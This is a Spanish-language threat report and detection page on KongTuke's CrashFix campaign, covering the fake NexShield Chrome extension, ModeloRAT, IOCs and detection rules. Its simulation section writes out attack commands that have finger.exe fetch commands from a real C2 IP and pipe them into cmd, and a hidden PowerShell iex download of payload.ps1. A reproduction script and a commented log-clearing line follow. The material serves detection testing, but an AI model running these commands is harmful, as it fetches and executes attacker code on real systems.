Desglosando CrashFix: El Nuevo Juguete de KongTuke
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
KongTuke distribuyó una extensión maliciosa de Chrome, NexShield, que imita a uBlock Origin Lite. Una vez instalada, muestra una advertencia de seguridad «CrashFix» para simular un incidente legítimo de seguridad del navegador, hace que el navegador se bloquee y coacciona al usuario para que ejecute un comando malicioso de PowerShell copiado en el portapapeles. La campaña despliega un RAT de Python, ModeloRAT, en sistemas unidos a dominios y una cadena de PowerShell de varias etapas en hosts independientes.
Investigación
Los analistas de Huntress revisaron el código de la extensión, vincularon el comando y control a nexsnield.com e invirtieron la ingeniería de las cargas útiles. Observaron el abuso de finger.exe como LOLBin para recuperar instrucciones del atacante, además de un DGA que genera dominios .top. Para entornos en un dominio, los investigadores identificaron un implante de Python cifrado con RC4 que persiste a través de la clave HKCU Run. La ciberinteligencia adicional incluyó verificaciones de anti-análisis, saltos AMSI, y tácticas de agotamiento de recursos destinadas a presionar a los usuarios para un rápido cumplimiento total.
Mitigación
Bloquee el ID de la extensión de Chrome y monitoree las extensiones desconocidas que imitan bloqueadores de anuncios populares. Detecte activación a nexsnield.com, las IPs de C2 y los dominios producidos por DGA. Aplique control de ejecución para limitar el uso de LOLBin (incluyendo finger.exe) y alerte sobre valores sospechosos de la clave Run, particularmente nombres diseñados para parecer software ampliamente utilizado.
Respuesta
Alerte sobre instalaciones de extensiones relacionadas con NexShield y correlacione con conexiones de salida a la infraestructura C2 y DGA identificada. Aísle los hosts afectados y recoja artefactos de extensión, claves de registro Run, tareas programadas y archivos descargados. Elimine la persistencia de ModeloRAT, erradique los componentes de la fase de PowerShell y remedie y valide el punto final.
Flujo de ataque
Detecciones
Llamada a Métodos .NET Sospechosos desde PowerShell (vía powershell)
Ver
Uso Sospechoso de CURL (vía cmdline)
Ver
Nombre de Archivo Corto (vía cmdline)
Ver
Posible Operación de Scripting o Manual en Carpetas Inusuales (vía cmdline)
Ver
Cadenas de PowerShell Sospechosas (vía powershell)
Ver
Llamada a Funciones API de Windows Sospechosas desde PowerShell (vía powershell)
Ver
Posibles Puntos de Persistencia [ASEPs – Hive de Software/NTUSER] (vía registro_event)
Ver
Un Archivo Fue Extraído a un Directorio Sospechoso Usando PowerShell (vía powershell)
Ver
Ejecución de Python desde Carpetas Sospechosas (vía cmdline)
Ver
Posibles Indicadores de Ofuscación de PowerShell (vía powershell)
Ver
Posible Enumeración del Sistema (vía cmdline)
Ver
Descarga o Subida vía PowerShell (vía cmdline)
Ver
IOCs (IP Fuente) para detectar: Descomponiendo CrashFix: El Nuevo Juguete de KongTuke
Ver
IOCs (HashSha256) para detectar: Descomponiendo CrashFix: El Nuevo Juguete de KongTuke
Ver
IOCs (DestinoIP) para detectar: Descomponiendo CrashFix: El Nuevo Juguete de KongTuke
Ver
IOCs (Emails) para detectar: Descomponiendo CrashFix: El Nuevo Juguete de KongTuke
Ver
Detectar Ejecución Maliciosa de Comandos de CrashFix de KongTuke [Creación de Procesos de Windows]
Ver
Detección de Salto de AMSI y Eliminación de Evidencias vía PowerShell [PowerShell de Windows]
Ver
Ejecución de Simulación
Prerequisito: La Verificación Previa de Telemetría y Línea Base debe haber sido superada.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección.
-
Narrativa y Comandos de Ataque:
El adversario primero copia elfinger.exelegítimo al directorio temporal, lo renombra act.exe, y luego utiliza unacmd /ccadena anidada para invocar el binario copiado con un argumento diseñado que contacta a un servidor C2 remoto (199.217.98.108). El binario transmite la carga de nuevo a la línea de comandos, que luego se canaliza a un segundocmdque ejecuta el código recibido. Posteriormente, el atacante utiliza PowerShell para descargar una carga secundaria medianteInvoke‑WebRequesty la ejecuta inmediatamente coniex. Todos los pasos se realizan con una interfaz de usuario mínima (/min) para evitar la detección por parte del usuario.1. Copiar finger.exe → %TEMP%ct.exe 2. Ejecutar: cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd" 3. Descargar y ejecutar carga secundaria con PowerShell: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content" -
Script de Prueba de Regresión: El siguiente script reproduce la cadena completa de ataque en una máquina de prueba Windows. Ejecútelo en una sesión de PowerShell con privilegios elevados.
#------------------------------------------------- # Ejecución Maliciosa de Comandos de CrashFix de KongTuke #------------------------------------------------- # 1. Desplegar el LOLBin (finger.exe) a %TEMP% como ct.exe $fingerPath = "$env:windirsystem32finger.exe" $tempExe = "$env:TEMPct.exe" Copy-Item -Path $fingerPath -Destination $tempExe -Force # 2. Ejecutar la cadena de comandos maliciosos (coincide con la regla Sigma) $maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%system32finger.exe %temp%ct.exe&%temp%ct.exe confirm@199.217.98.108|cmd"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden # 3. Descarga web con PowerShell y ejecución de carga secundaria $payloadUrl = 'http://199.217.98.108/payload.ps1' $psCommand = "iex (Invoke-WebRequest -Uri `'$payloadUrl`' -UseBasicParsing).Content" Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `$psCommand`" -WindowStyle Hidden #------------------------------------------------- -
Comandos de Limpieza: Eliminar artefactos y terminar cualquier proceso persistente creado por la prueba.
# Eliminar el ct.exe copiado Remove-Item -Path "$env:TEMPct.exe" -ErrorAction SilentlyContinue # Matar cualquier proceso de cmd.exe o powershell.exe que haya sido iniciado por la prueba (filtrar por línea de comandos específica) Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match 'finger.exe|199.217.98.108' } | ForEach-Object { $_.Terminate() } # Opcional: limpiar el Registro de Eventos si es necesario para la repetibilidad # wevlutil cl Security